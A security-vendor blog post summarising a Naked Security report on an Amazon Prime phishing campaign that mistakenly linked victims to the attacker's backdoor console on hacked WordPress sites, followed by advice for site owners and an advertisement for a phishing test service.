Amazon Prime Phishbait: Lessons Learned

10An Amazon phishing campaign is accidentally sending out links that lead straight to the attacker’s remote access console, according to Paul Ducklin at Naked Security. Ducklin explains that Sophos came across a generic Amazon Prime phishing email which informed recipients that their Amazon account had been suspended. The email contained a link for the user to verify their account by updating their card number and billing address.

The email wasn’t particularly convincing or well-written, but the Sophos researchers followed the link to see where it would take them. The link first redirected them through two legitimate WordPress sites, which had apparently been hacked by the attacker to use as stepping stones before the actual phishing site. This is a common tactic to avoid being detected by spam filters.

After this, the attacker presumably intended to send the victim to a phishing page that would try to steal their Amazon credentials and financial details. However, the attacker seems to have made a disastrous mistake and instead used the URL to the console that controlled the hacked WordPress sites.

The attacker had planted a small, obscure PHP file on each compromised site that granted them direct access to the site’s files and allowed them to do things that even the WordPress administrator couldn’t do.

“In other words, the crooks have set things up so they can sidestep the WordPress administration console entirely,” Ducklin explains. “They don’t need a password; they won’t get logged by the WordPress system; and they can add and modify files that WordPress wouldn’t normally allow, essentially allowing them to hide content such as phishing pages and malware downloads in plain sight.”

It’s not clear how the attacker compromised these sites in the first place, but Ducklin notes that outdated and vulnerable WordPress plugins are a frequent entry point. Ducklin says the story demonstrates the importance of good security practices for website administrators as well as for regular users. Even a minor website can have value to criminals as a staging area for future crimes.

“If your site gets hacked, you’ll probably end up blocklisted,” he writes. “Once the crooks start using your website to host malicious content, you are likely to end up getting blocked or filtered by security products and the major browsers.”

New-school security awareness training can create a culture of security within your organization by teaching all of your employees to follow security best practices.

Naked Security has the story:

Free Phishing Security Test

Would your users fall for convincing phishing attacks? Take the first step now and find out before the bad guys do. Plus, see how you stack up against your peers with phishing Industry Benchmarks. The Phish-prone percentage is usually higher than you expect and is great ammo to get budget.

PST ResultsHere's how it works:

  • Immediately start your test for up to 100 users (no need to talk to anyone)
  • Select from 20+ languages and customize the phishing test template based on your environment
  • Choose the landing page your users see after they click
  • Show users which red flags they missed, or a 404 page
  • Get a PDF emailed to you in 24 hours with your Phish-prone % and charts to share with management
  • See how your organization compares to others in your industry

Go Phishing Now!

PS: Don't like to click on redirected buttons? Cut & Paste this link in your browser:

Topics: Phishing

Subscribe To Our Blog

Ransomware Has Gone Nuclear Webinar

Get the latest about social engineering

Subscribe to CyberheistNews